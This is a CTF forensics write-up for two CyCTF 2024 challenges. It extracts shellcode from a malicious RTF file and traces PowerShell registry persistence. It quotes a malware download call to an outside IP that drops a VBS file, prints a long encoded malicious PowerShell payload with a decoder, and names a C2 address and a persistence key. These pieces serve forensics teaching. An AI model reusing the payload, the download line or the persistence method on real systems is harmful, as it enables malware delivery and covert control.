CyCTF 2024 Qualifications | Forensics Challenges Writeup
For the third consecutive year, I had the opportunity to participate in CyCTF, powered by CyShield.
In this write-up, I will walk through the solutions to two challenges I tackled in the CTF: WarmUP and Persisted, and without any further due, let’s get into things.
1. WarmUp
Download the challenge from here and try to solve it.
Tools:
Step 1: Identifying Hidden Data in the Attachment
The attachment provided was a .rtf
file (Rich Text Format), which can sometimes contain hidden data. To analyze this file, we used a tool called rtfdump.py
, which allows us to look inside .rtf
files and find different parts (or "streams") where hidden information might be stored.
- Command Used:
rtfdump.py
was run on the attachment to show us all the hidden sections inside it. - Outcome: We found several hidden parts of data in the file that could be suspicious.
Step 2: Extracting Data in a Readable Format
After identifying the hidden sections, we needed to look at them in a readable format. We used rtfdump.py
again, with additional options to turn the data into a simple, readable form (hexadecimal format).
- Command Used:
python rtfdump.py -s a -d -H C:\Users\$user\Desktop\Warm_UP.rtf > out.bin
- This command told
rtfdump.py
to select all data parts (-s a
), dump them (-d
), and decode them to hexadecimal (-H
). The data was saved into a file calledout.bin
.
Step 3: Searching for Malicious Code
The next step was to look for specific keywords that attackers often use in their code, like “PowerShell.” PowerShell is a tool often used in Windows computers for scripting; attackers sometimes use it to download malicious content. To search for this, we used a tool called XORSearch
.
- Command Used:
XORSearch.exe -W C:\Users\$user\Desktop\o.bin
- This command scanned the file (
o.bin
) for any signs of PowerShell commands or similar keywords. - Outcome: The tool pointed us to a few places in the file where PowerShell commands seemed hidden.
Step 4: Decoding the Hidden Web Link
Now that we had locations of possible malicious code, we used a tool called scdbg
. This tool helps to carefully decode any commands found at specific points in the data. By entering the first location offset (0000191E) that we found in the previous step, we could make scdbg
reveal the hidden web link.
- Outcome:
scdbg
revealed a single command, which included a web link used by the attacker to download their malicious content, and finally, we got our flag.
You need to replace your username with “IEUser.” as it was noted in the description of the challenge.
Flag: CyCTF{URLDownloadToFileW(http://107.172.130.147/460/newpicturesgetmetonicewith.tIF, C:\Users\IEUser\AppData\Roaming\newpicturesgetmetonicewit.vBS)}
Acknowledgment
Special shout out to my teammate CyberAssassin
for his invaluable help and support throughout this challenge.
2. Persisted
Flag Format: CyCTF{HKCU\Software\Microsoft\Windows\Key:file.ext:127.0.0.1:1337}
Download the challenge from here and try to solve it.
Tools
Step 1: Loading the Registry Files
First, I used Registry Explorer to open and examine various Windows registry hives. These hives are like databases containing settings and configurations for different parts of the Windows operating system and installed software.
The loaded hives were System, Security, Sam, Software, Default, Ntuser
Step 2: Searching for PowerShell Commands
Using the CTRL + F search function, we look for any signs of PowerShell commands.
I found 3 encoded PowerShell scripts located in different registry hives:
- NTUSER.hiv
- SYSTEM.hiv
- DEFAULT.hiv
One of these entries was labeled with a suspicious key name, GameBarApi
.
Step 3: Decoding the Encoded PowerShell Command
The PowerShell command was encoded, meaning it was transformed into a string of characters that isn’t human-readable. To understand what this command was doing, we needed to decode it.
The encoded script was a long Base64 string, which is a common way of encoding binary data as text. I used CyberChef, an online tool for data transformation, to decode this Base64 string into readable text.
Step 4: Decoding the XOR Encryption
The decoded script above was still encoded further using a technique called XOR encryption. XOR encryption is a way to transform data by combining it with a “key” (a number or string). In this case, each character in the script was XORed with the number 35.
To fully decode the script, use a Python script that removed the XOR encryption:
import base64
# Base64-encoded string
encoded_base64 = "32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbIUHlrquJim3MjIyNuEupicmJySSBicmKZdKq85dz2yHp4a6riaxLxaqr7bhLqcUsjIWOncXFimch2DRjc9muq5Wug4HNJKXxrqtJrqvlq5OPc3NzcbhLqcXFimQ4lO1jc9qbjLKa+IiMja9zsLKevIiMjyPDKxyIjI8uB3NzcDGhPRmIj9sJ6cjkdeKND2zWe022vtFwfEjW3X1HiRQyOqEi6WLbAVNa0YzDmrI+vX84XYH7R/iAqDrXADq/MXoxe08GKMDev+V83749A5iN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDe0FMWwouKSNyZtr1BbmZXBwfvTF4zyxVAXV65wIXDjDJgpb/ltLmzzNrBU31Shf/L0BzGNkSXKjh/yrUNEmaIzQ69tWW1FlbMtr8ebvaJaaoxJ/jdL5AyntkSdY1cy3O1cUwsVTNyOGnRc3xlDUs6Q1uM0lcrfuBMOwghpJ77GEBcHpjja7NEYQ7vjCZkltT1+WUKzbv5EyeRum39fKLw8AnhU4bqpna7zVQDU9prW9TN55nYsWPR46N8TvFhuUvCvM9jYKXhGFqnW3sqXG0HoQBgg31fXjokTvUVSzishpVzRkjYp3TloF13PZrEuqZIyNjI2KbIzMjI2KaYyMjI2KZe4dwxtz2a7BwcGuqxGuq0muq+WKbIwMjI2qq2mKZMbWqwdz2a6DnA6bjV5VFqCRrIuCm41b0e3t7ayYjIyMjc+DLvN7c3BIaEQ0SFRsNEhIVDRIRGiMZ/UuS"
# Decode the Base64 string
xor_encoded_data = base64.b64decode(encoded_base64)
# XOR each byte with 35 to decode
key = 35
decoded_chars = [chr(byte ^ key) for byte in xor_encoded_data]
# Join the decoded characters into a string
decoded_script = ''.join(decoded_chars)
print(decoded_script)
- The Output: The script returned the User Agent and the IP, but no port, so it may be port 80 or 443 because it makes a connection to a webserver and there are the default ports.
Step 5: Analyzing Using VirusTotal
To further investigate, I uploaded the decoded PowerShell script file to VirusTotal.
Upon analysis, VirusTotal flagged the script as malicious and revealed additional details, including an IP address and port number used for Command and Control (C2) communication by the attacker.
You can find the link for analysis here.
Step 6: Examining the Key Name GameBarApi for Persistence Details
Using Registry Explorer, I searched for a suspicious key name, GameBarApi
, which I had initially encountered in one of the encoded PowerShell scripts. This key contained the following PowerShell command:
This command indicates that PowerShell is retrieving and executing a Base64-encoded script stored in the registry key HKCU:\Software\Microsoft\GameBarApi
. The command’s Last Write Time was 2024-10-24 21:13:45
, suggesting this was a key event in the persistence setup.
Step 7: Identifying the Initial Access Time
To trace the initial access method, I focused on files accessed around the time the registry key was last modified. In Registry Explorer, I checked the RecentDocs entry and filtered entries for documents accessed between 2024-10-24 21:13:45
and 2024-10-24 21:18:45
(5 minutes after the registry key modification).
Step 8: Inspecting Recent Documents for Initial Access Files
To identify the file used for initial access, I checked the RecentDocs section of the registry, which logs recently opened documents. In this case, I discovered two suspicious files with names:1223.phantom
and cyshell2.ps1.txt
After analyzing their timestamps and potential relevance, I determined that 1223.phantom
was likely the initial access file, as it appeared before the persistence setup was completed.
Step 9: Locating the Initial Registry Key Responsible for Persistence
Further examination revealed that after executing 1223.phantom
, the attacker created a registry key to maintain persistence. The initial registry key responsible for persistence was:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList
This key instructs Windows to associate files with the .phantom
extension with a particular application, enabling the attacker’s payload to execute whenever a .phantom
file is opened with an execute PowerShell.exe
.
Flag: CyCTF{HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList:1223.phantom:192.168.116.129:80}
3. Injection
Download the challenge from here and try to solve it.
I spent a significant amount of time working on the third challenge, hoping to find a solution. Unfortunately, I was unable to complete it successfully.
However, I found helpful write-ups from other participants who managed to solve it. You can find these write-ups here:
If you reached here after reading all of this, you are a Legend ^_^
Contact me if you want to discuss anything: LinkedIn